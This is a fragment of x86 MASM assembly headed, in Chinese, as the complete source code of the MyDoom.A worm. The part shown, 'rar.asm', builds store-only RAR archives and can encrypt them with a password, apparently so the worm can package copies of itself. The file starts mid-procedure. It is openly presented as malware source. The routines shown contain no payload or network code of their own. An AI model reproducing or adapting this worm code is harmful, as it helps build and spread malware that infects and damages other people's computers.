rar.asm

蠕虫mydoom.a版本的完整源代码

        inc     edx
        cmp     byte ptr[edx], 0
        jnz     @l

        ret
SetOldKeys endp

SetCryptKeys proc uses esi edi ebx szPassword: DWORD
        LOCAL   Psw[256]: BYTE
        LOCAL   N1: BYTE
        LOCAL   N2: BYTE
        LOCAL   I, J, K, PswLength: DWORD

        invoke  SetOldKeys, szPassword

        mov     Key0, 0D3A3B879h
        mov     Key1, 03F6D12F7h
        mov     Key2, 07515A235h
        mov     Key3, 0A4E7F123h

        invoke  ZeroMemory, addr Psw, 256
        invoke  lstrcpy, addr Psw, szPassword
        invoke  lstrlen, szPassword
        mov     PswLength, eax

        mov     esi, offset InitSubstTable
        mov     edi, offset SubstTable
        mov     ecx, 256
        rep movsb

        mov     J, 0
        .WHILE  J < 256
                mov     I, 0

        @fori:
                lea     eax, Psw
                mov     ecx, I
                inc     ecx
                movzx   eax, byte ptr[eax+ecx]
                add     eax, J
                and     eax, 0ffh
                mov     eax, dword ptr[CRCTable+eax*4]
                mov     N2, al

                lea     eax, Psw
                mov     ecx, I
                movzx   eax, byte ptr[eax+ecx]
                sub     eax, J
                and     eax, 0ffh
                mov     eax, dword ptr[CRCTable+eax*4]
                mov     N1, al

                mov     K, 1
                .WHILE  TRUE
                        mov     cl, N1
                        .IF     cl == N2
                                .BREAK
                        .ENDIF

                        movzx   eax, N1
                        add     eax, offset SubstTable
                        mov     bl, byte ptr[eax]
                        movzx   edx, N1
                        add     edx, I
                        add     edx, K
                        and     edx, 0ffh
                        add     edx, offset SubstTable
                        mov     cl, [edx]
                        mov     byte ptr[eax], cl
                        mov     byte ptr[edx], bl

                        inc     N1
                        inc     K
                .ENDW

                add     I, 2
                mov     eax, PswLength
                cmp     I, eax
                jl      @fori

                inc     J
        .ENDW

        lea     ebx, Psw
        mov     I, 0
@l:
        invoke  EncryptBlock, ebx
        add     ebx, 16
        add     I, 16
        mov     eax, I
        cmp     eax, PswLength
        jl      @l
      
        ret
SetCryptKeys endp

RarCloak proc begin_offs, len, zfile: DWORD
        LOCAL   bTemp[16]: BYTE
        LOCAL   bRead: DWORD

        .IF     !len
                ret
        .ENDIF

        invoke  SetFilePointer, zfile, begin_offs, NULL, FILE_BEGIN

@l:
        invoke  SetFilePointer, zfile, 0, NULL, FILE_CURRENT
        push    eax
        invoke  ReadFile, zfile, addr bTemp, 16, addr bRead, NULL
        invoke  EncryptBlock, addr bTemp
        pop     eax
        invoke  SetFilePointer, zfile, eax, NULL, FILE_BEGIN
        invoke  WriteFile, zfile, addr bTemp, 16, addr bRead, NULL
        sub     len, 16
        jnz     @l

        ret
RarCloak endp

; Archive type: store only; szPassword can be NULL
CreateRarFile proc uses ebx InFile, OutFile, StoreAs, szPassword: DWORD
        LOCAL   hFileIn, hFileOut, buf, dwWritten, bRead: DWORD
        LOCAL   a_hdr: ArchiveHeader
        LOCAL   f_hdr: FileHeader
        LOCAL   storeas_len: DWORD
        LOCAL   f_date: WORD
        LOCAL   f_time: WORD
        LOCAL   crypt_offset: DWORD
        LOCAL   crypt_allign: DWORD

        xor     ebx, ebx
        invoke  GlobalAlloc, GMEM_FIXED, 8192
        mov     buf, eax

        invoke  CreateFile, InFile, GENERIC_READ, FILE_SHARE_READ or FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL
        mov     hFileIn, eax
        inc     eax
        jz      @cra_ret

        invoke  CreateFile, OutFile, GENERIC_WRITE or GENERIC_READ, FILE_SHARE_READ or FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, 0, NULL
        mov     hFileOut, eax
        inc     eax
        jz      @cra_ret

        invoke  lstrlen, StoreAs
        mov     storeas_len, eax

        invoke  WriteFile, hFileOut, offset MarkHeader, 7, addr dwWritten, NULL

        invoke  ZeroMemory, addr a_hdr, sizeof ArchiveHeader
        invoke  ZeroMemory, addr f_hdr, sizeof FileHeader
        mov     a_hdr.HEAD_TYPE, HEAD_ARCHIVE
        mov     a_hdr.HEAD_SIZE, sizeof ArchiveHeader
        invoke  CRC32Update, 0, addr a_hdr.HEAD_TYPE, sizeof ArchiveHeader - 2
        mov     a_hdr.HEAD_CRC, ax
        invoke  WriteFile, hFileOut, addr a_hdr, sizeof ArchiveHeader, addr dwWritten, NULL

        mov     f_hdr.HEAD_TYPE, HEAD_FILE
        mov     f_hdr.HEAD_SIZE, sizeof FileHeader
        mov     eax, storeas_len
        add     f_hdr.HEAD_SIZE, ax
        mov     f_hdr.NAME_SIZE, ax

        invoke  GetFileSize, hFileIn, NULL
        mov     f_hdr.PACK_SIZE, eax
        mov     f_hdr.UNP_SIZE, eax
        mov     f_hdr.HEAD_FLAGS, 8040h

        .IF     szPassword
                or      f_hdr.HEAD_FLAGS, 04h
                ; 16 byte aligned (TODO: div->and)
                mov     ecx, 16
                xor     edx, edx
                div     ecx
                sub     ecx, edx
                add     f_hdr.PACK_SIZE, ecx
                mov     crypt_allign, ecx
        .ENDIF

        mov     f_hdr.HOST_OS, 2        ; Win32
        invoke  CRC32File, hFileIn
        mov     f_hdr.FILE_CRC, eax

        mov     f_hdr.UNP_VER, 14h
        mov     f_hdr.METHOD, 30h	; Store only
        mov     f_hdr.ATTR, 20h

        invoke  ZipFilePutTime, addr f_time, addr f_date
        movzx   eax, f_date
        shl     eax, 16
        or      ax, f_time
        mov     f_hdr.FTIME, eax

        invoke  CRC32Update, 0, addr f_hdr.HEAD_TYPE, sizeof FileHeader - 2
        invoke  CRC32Update, eax, StoreAs, storeas_len
        mov     f_hdr.HEAD_CRC, ax

        invoke  WriteFile, hFileOut, addr f_hdr, sizeof FileHeader, addr dwWritten, NULL
        invoke  WriteFile, hFileOut, StoreAs, storeas_len, addr dwWritten, NULL
        invoke  SetFilePointer, hFileOut, 0, NULL, FILE_CURRENT
        mov     crypt_offset, eax

@l:
        invoke  ReadFile, hFileIn, buf, 8192, addr bRead, NULL
        .IF     bRead
                invoke  WriteFile, hFileOut, buf, bRead, addr dwWritten, NULL
                jmp     @l
        .ENDIF

        .IF     szPassword
                invoke  SetCryptKeys, szPassword
                invoke  WriteFile, hFileOut, buf, crypt_allign, addr dwWritten, NULL
                invoke  RarCloak, crypt_offset, f_hdr.PACK_SIZE, hFileOut
        .ENDIF

        invoke  CloseHandle, hFileIn
        invoke  CloseHandle, hFileOut
        inc     ebx

@cra_ret:
        invoke  GlobalFree, buf
        mov     eax, ebx
        ret
CreateRarFile endp